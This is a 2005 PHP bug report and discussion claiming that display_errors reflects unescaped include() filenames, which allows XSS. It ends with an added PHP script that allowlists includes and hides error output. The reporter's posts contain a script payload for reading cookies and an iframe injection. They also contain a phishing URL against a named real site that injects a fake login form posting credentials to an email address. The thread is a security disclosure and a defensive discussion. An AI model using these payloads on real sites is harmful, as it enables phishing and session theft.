ID: 33173
Updated by: [EMAIL PROTECTED]
Reported By: max at jestsuper dot pl
Status: Bogus
Bug Type: *General Issues
Operating System: *
PHP Version: *
New Comment:
Here we have two errors:
a) letting unchecked data be used as filename
b) showing plain errors to the user

about a) _every_ input data needs to be checked. Or we would need to remove eval since some user might do an eval($_GET['code'])

about b) as Marcus wrote you shouldn't show plain error messages to your users. This for two reasons: first the user doesn't understand what's wrong and might think he's too stupid and second for a bit of security, if some bad guy doesn't know where a GET-value is used he has limited chance in finding an exploit.

And a further note: changing the filename for the error message might also make debugging harder since the name shown isn't exactly the one used so it might be harder to track the reason


Previous Comments:
------------------------------------------------------------------------

[2005-05-30 18:56:29] max at jestsuper dot pl

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> ID: 33173
> Updated by: [EMAIL PROTECTED]
> Reported By: max at jestsuper dot pl
> -Status: Open
> +Status: Bogus
> Bug Type: *General Issues
> -Operating System: FreeBSD
> +Operating System: *
> -PHP Version: 4.3.11
> +PHP Version: *
> New Comment:
>
> Thank you for taking the time to write to us, but this is not
> a bug.

This is bug [XSS].

> Please double-check the documentation available at
> http://www.php.net/manual/ and the instructions on how to report
> a bug at http://bugs.php.net/how-to-report.php

Ok. But this bug still exists, if (html_errors false) etc.

> You're not supposed to pass the error information to your users. Show
> errors is only a convenience thing to aid you while developing. Thus no
> user will ever see such error messages. So in the end it is not usable
> for phishing and alike.

It is.. ;] That can be very dangerous. For example phishing. This is XSS! So ok.
Example newweb.wrh.noaa.gov

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=%3CP%3E%3Cfont%20color=red%3E%3CP%3E%3Ch1%3EWARNING!%20SYSTEM%20ERROR%3CBR%3EPlease%20login: %3C/h1%3E%3C/font%3E%3Cfont%20size=-4%3E%3C/center%3E%20%3CFORM%20METHOD=POST%20ACTION=mailto:[EMAIL PROTECTED]: %3CINPUT%20TYPE=text%20NAME=login%20SIZE=9%3E%3CP%3EPASSWORD: %3CINPUT%20TYPE=password%20NAME=passwd%20SIZE=9%3E%3CP%3E%3Cinput%20type=submit%20name=go%20value=Login%3E%3C/form%3E%3Cfont%20color=white%3E

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=<iframe src=http://newweb.wrh.noaa.gov>

But php errors (Warning) can be in a BANK site... and can you create form ... phishing!

Tell me what is wrong.
Thx
SecurityReason.Com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmjvuznmvyJCR4zQRApfYAKCHEknKWRw8zchV6qIwkM0DZt9JNQCfRvcm
IDvuoOSzh75uSA9A1xnFiYc=
=S4rb
-----END PGP SIGNATURE-----

------------------------------------------------------------------------

[2005-05-28 19:02:37] [EMAIL PROTECTED]

Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

You're not supposed to pass the error information to your users. Show
errors is only a convenience thing to aid you while developing. Thus no
user will ever see such error messages. So in the end it is not usable
for phishing and alike.

------------------------------------------------------------------------

[2005-05-28 16:57:51] max at jestsuper dot pl

Description:
------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 28.5.2005
from securityreason.com TEAM

- --- 0. Bug in PHP 4.3.11 display_error. ---

This bug can be dangerous, because someone can do XSS and Phishing attack. Problem exists in display_errors..
Example php script:

<?php
include($_GET['varible']);
?>

and now request is ?varible=XXX so can we see any error.

- ---
Warning: main(XXX): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening 'XXX' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

Normal. But now varible has for example <h1>SR</h1>
And error messages are:

- ---
Warning: main( SR ): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening '<h1>SR</h1>' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

So XSS... Danger can be tag <script> <iframe>, because you can see cookies etc.
For example.
?varible=<script>alert(document.cookie);</script>
And you have cookies from this domain!

This XSS is critical, because it exists in display_error and hacker can do XSS and Phishing attack. For example, if this bug exists in a Bank site... hacker can create <FORM> or mirror site...

- --- 1.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: securityreason.com TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmIWvznmvyJCR4zQRAuqtAKCcyXWQnMdPvCn+6+npQiGEbXvAZwCgq172
+J8w9EzGFE49sXxP1MPbSfI=
=QksY
-----END PGP SIGNATURE-----

Actual result:
--------------
XSS

------------------------------------------------------------------------

-- 
Edit this bug report at http://bugs.php.net/?id=33173&edit=1
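The maintainer's closing comment names two separate defects: the request value is used unchecked as a filename, and PHP's own warning text is rendered into the response. The script below is an added illustration of fixing both, written for this page; it is not code from the bug report, from securityreason.com or from PHP itself. The `pages/` file names, the `/var/log/php/app.log` path and the `PAGES` map are constructed for the example; `display_errors`, `log_errors` and `error_log` are real php.ini directives.

```php
<?php
// Added example (not from bug #33173): the include($_GET['varible'])
// pattern from the report, contrasted with a version that (a) never lets
// request data form a path and (b) never lets PHP warnings reach the browser.
declare(strict_types=1);

// --- (b) production error handling -----------------------------------
// In production these belong in php.ini or the server config; setting them
// here keeps the example self-contained. With display_errors off, a failed
// include() produces no "Failed opening '<...>'" text in the response at all,
// regardless of html_errors, so the reflected-markup problem does not arise.
ini_set('display_errors', '0');               // nothing echoed into the page
ini_set('log_errors', '1');                   // keep warnings for developers
ini_set('error_log', '/var/log/php/app.log'); // assumed log path

// --- the pattern from the report, kept only for contrast, never executed ---
// include($_GET['varible']);
// On failure with display_errors on, the raw parameter is printed inside the
// warning, so whatever markup the request carried lands in the HTML.

// --- (a) allowlisted include -----------------------------------------
// Short public names map to fixed files. The request value is only ever used
// as an array key; it never becomes part of a path and is never echoed.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',    // constructed file names
    'contact' => __DIR__ . '/pages/contact.php',
];

/** Return the fixed file for a known page name, or null for anything else. */
function resolvePage(string $name): ?string
{
    return array_key_exists($name, PAGES) ? PAGES[$name] : null;
}

// ?varible[]=x arrives as an array, so type-check before passing it on.
$requested = $_GET['varible'] ?? null;
$page = is_string($requested) ? resolvePage($requested) : null;

if ($page === null) {
    // Record the rejected value for the developer, with control characters
    // escaped so it cannot forge log lines; tell the user only that the page
    // is unknown and reflect nothing from the request.
    $forLog = is_string($requested) ? $requested : gettype($requested);
    error_log('rejected page parameter: ' . addcslashes($forLog, "\0..\37\177..\377"));
    http_response_code(404);
    echo 'Unknown page.';
    exit;
}

// Whatever reaches include here is one of our own constants.
include $page;
```

The two halves are independent: turning off display_errors removes the reflected warning but leaves arbitrary file inclusion in place, and the allowlist removes the inclusion but would still leak warning text for other failures, so a deployment wants both. Logging the rejected value is what makes the maintainer's debugging concern tolerable: the developer still sees exactly which string was refused, in the log rather than in the page.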
